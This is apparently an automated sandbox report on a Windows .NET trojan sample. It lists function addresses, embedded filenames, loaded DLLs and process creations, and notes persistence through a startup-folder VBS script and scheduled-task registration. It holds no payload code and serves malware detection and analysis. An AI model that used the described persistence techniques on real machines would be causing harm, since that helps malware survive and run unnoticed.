                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CFE5134_2_00CFE513
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CFA6604_2_00CFA660
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CFCBA04_2_00CFCBA0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF0D384_2_00CF0D38
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF68594_2_00CF6859
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF68684_2_00CF6868
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF6DE84_2_00CF6DE8
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_0507B6B84_2_0507B6B8
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_050717004_2_05071700
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_0507B6AA4_2_0507B6AA
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_050716EF4_2_050716EF
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_05079C104_2_05079C10
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_05079C204_2_05079C20
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_05073B304_2_05073B30
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_05073B404_2_05073B40
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_0521E5864_2_0521E586
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_05218C384_2_05218C38
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_0521E9034_2_0521E903
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_052B00134_2_052B0013
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_052B00404_2_052B0040
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_0545CDA04_2_0545CDA0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_054587C04_2_054587C0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_054587B04_2_054587B0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_054500404_2_05450040
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_054598404_2_05459840
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_054598504_2_05459850
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_054500064_2_05450006
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_0545D0C74_2_0545D0C7
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_0545E39A4_2_0545E39A
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_055471304_2_05547130
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_055439984_2_05543998
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_055471214_2_05547121
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_055439894_2_05543989
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_0554A8004_2_0554A800
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_0554A7F04_2_0554A7F0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_0556ED484_2_0556ED48
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_0556E1A04_2_0556E1A0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_055500404_2_05550040
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_055500064_2_05550006
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_00EAE5137_2_00EAE513
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_00EAA6607_2_00EAA660
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_00EACBA27_2_00EACBA2
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_00EA0D387_2_00EA0D38
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_00EA3E687_2_00EA3E68
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_00EAA6507_2_00EAA650
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_00EA68687_2_00EA6868
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_00EA68597_2_00EA6859
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_00EA6DE87_2_00EA6DE8
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_02D1B6B87_2_02D1B6B8
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_02D116EF7_2_02D116EF
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_02D1B6AA7_2_02D1B6AA
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_02D117007_2_02D11700
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_02D13B407_2_02D13B40
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_02D13B327_2_02D13B32
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_02D19C107_2_02D19C10
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_02D19C207_2_02D19C20
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_054EE5867_2_054EE586
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_054E89F87_2_054E89F8
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_054EE9037_2_054EE903
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_055800407_2_05580040
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_0558001A7_2_0558001A
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_056347487_2_05634748
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_05630FB07_2_05630FB0
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_05637A107_2_05637A10
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_056347397_2_05634739
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_05630FA07_2_05630FA0
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_05637A067_2_05637A06
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_056FC6287_2_056FC628
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_0572CD907_2_0572CD90
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_057287C07_2_057287C0
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_057287B07_2_057287B0
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_057298507_2_05729850
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_057200407_2_05720040
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_057298407_2_05729840
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_057200077_2_05720007
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_0572D0C77_2_0572D0C7
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_0583ED487_2_0583ED48
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_0583E1A07_2_0583E1A0
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_058200077_2_05820007
                      Source: C:\Users\user\AppData\Local\brokerutil.exeCode function: 7_2_058200407_2_05820040
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_0159E51311_2_0159E513
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_0159A66011_2_0159A660
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_0159CBA911_2_0159CBA9
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_01591E2D11_2_01591E2D
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_0159A65011_2_0159A650
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_0159685911_2_01596859
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_0159686811_2_01596868
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_01596DE811_2_01596DE8
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_0567B6B811_2_0567B6B8
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_0567170011_2_05671700
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_056716EF11_2_056716EF
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_0567B6AA11_2_0567B6AA
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05679C2011_2_05679C20
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05679C1011_2_05679C10
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05673B4011_2_05673B40
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05673B3011_2_05673B30
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05ACE58611_2_05ACE586
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05AC8C3811_2_05AC8C38
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05ACE90311_2_05ACE903
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05B6001611_2_05B60016
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05B6004011_2_05B60040
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05C4399811_2_05C43998
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05C4713011_2_05C47130
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05C4398811_2_05C43988
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05C4712111_2_05C47121
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05C4A80011_2_05C4A800
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05C4A7F011_2_05C4A7F0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05D0CD9011_2_05D0CD90
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05D087C011_2_05D087C0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05D087B011_2_05D087B0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05D0D0C711_2_05D0D0C7
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05D0985011_2_05D09850
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05D0004011_2_05D00040
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05D0984011_2_05D09840
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05D0000711_2_05D00007
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05D0E3A811_2_05D0E3A8
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05E1ED4811_2_05E1ED48
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05E1E1A011_2_05E1E1A0
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05E0004011_2_05E00040
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05E0000711_2_05E00007
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 11_2_05E0001F11_2_05E0001F
                      Source: uC4EETMDcz.exeStatic PE information: invalid certificate
                      Source: uC4EETMDcz.exe, 00000001.00000002.2396236865.00000000052B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameVgvkhncsxo.dll" vs uC4EETMDcz.exe
                      Source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs uC4EETMDcz.exe
                      Source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs uC4EETMDcz.exe
                      Source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameVgvkhncsxo.dll" vs uC4EETMDcz.exe
                      Source: uC4EETMDcz.exe, 00000001.00000002.2398413540.00000000055C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs uC4EETMDcz.exe
                      Source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs uC4EETMDcz.exe
                      Source: uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs uC4EETMDcz.exe
                      Source: uC4EETMDcz.exe, 00000001.00000002.2378662559.0000000002AF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs uC4EETMDcz.exe
                      Source: uC4EETMDcz.exe, 00000001.00000000.2145964643.0000000000768000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOoxmrww.exe0 vs uC4EETMDcz.exe
                      Source: uC4EETMDcz.exe, 00000001.00000002.2377714535.0000000000CFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs uC4EETMDcz.exe
                      Source: uC4EETMDcz.exeBinary or memory string: OriginalFilenameOoxmrww.exe0 vs uC4EETMDcz.exe
                      Source: uC4EETMDcz.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: uC4EETMDcz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: brokerutil.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: uC4EETMDcz.exe, -.csCryptographic APIs: 'CreateDecryptor'
                      Source: brokerutil.exe.1.dr, -.csCryptographic APIs: 'CreateDecryptor'
                      Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 1.2.uC4EETMDcz.exe.3c80c50.4.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 1.2.uC4EETMDcz.exe.3c80c50.4.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 1.2.uC4EETMDcz.exe.3c80c50.4.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.uC4EETMDcz.exe.3c80c50.4.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 1.2.uC4EETMDcz.exe.3c80c50.4.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 1.2.uC4EETMDcz.exe.3c80c50.4.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 1.2.uC4EETMDcz.exe.3c80c50.4.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 1.2.uC4EETMDcz.exe.3c80c50.4.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@14/6@1/2
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 3_2_0040166B CreateToolhelp32Snapshot,3_2_0040166B
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbsJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeMutant created: NULL
                      Source: C:\ProgramData\faer\wopbv.exeMutant created: \Sessions\1\BaseNamedObjects\Test Task17
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs"
                      Source: uC4EETMDcz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: uC4EETMDcz.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: uC4EETMDcz.exeReversingLabs: Detection: 57%
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeFile read: C:\Users\user\Desktop\uC4EETMDcz.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\uC4EETMDcz.exe "C:\Users\user\Desktop\uC4EETMDcz.exe"
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess created: C:\Users\user\Desktop\uC4EETMDcz.exe "C:\Users\user\Desktop\uC4EETMDcz.exe"
                      Source: unknownProcess created: C:\ProgramData\faer\wopbv.exe C:\ProgramData\faer\wopbv.exe
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\brokerutil.exe "C:\Users\user\AppData\Local\brokerutil.exe"
                      Source: C:\ProgramData\faer\wopbv.exeProcess created: C:\ProgramData\faer\wopbv.exe "C:\ProgramData\faer\wopbv.exe"
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess created: C:\Users\user\AppData\Local\brokerutil.exe "C:\Users\user\AppData\Local\brokerutil.exe"
                      Source: unknownProcess created: C:\ProgramData\faer\wopbv.exe C:\ProgramData\faer\wopbv.exe
                      Source: C:\ProgramData\faer\wopbv.exeProcess created: C:\ProgramData\faer\wopbv.exe "C:\ProgramData\faer\wopbv.exe"
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess created: C:\Users\user\Desktop\uC4EETMDcz.exe "C:\Users\user\Desktop\uC4EETMDcz.exe"Jump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess created: C:\ProgramData\faer\wopbv.exe "C:\ProgramData\faer\wopbv.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\brokerutil.exe "C:\Users\user\AppData\Local\brokerutil.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess created: C:\Users\user\AppData\Local\brokerutil.exe "C:\Users\user\AppData\Local\brokerutil.exe"Jump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess created: C:\ProgramData\faer\wopbv.exe "C:\ProgramData\faer\wopbv.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: version.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeSection loaded: windows.storage.dllJump to behavior
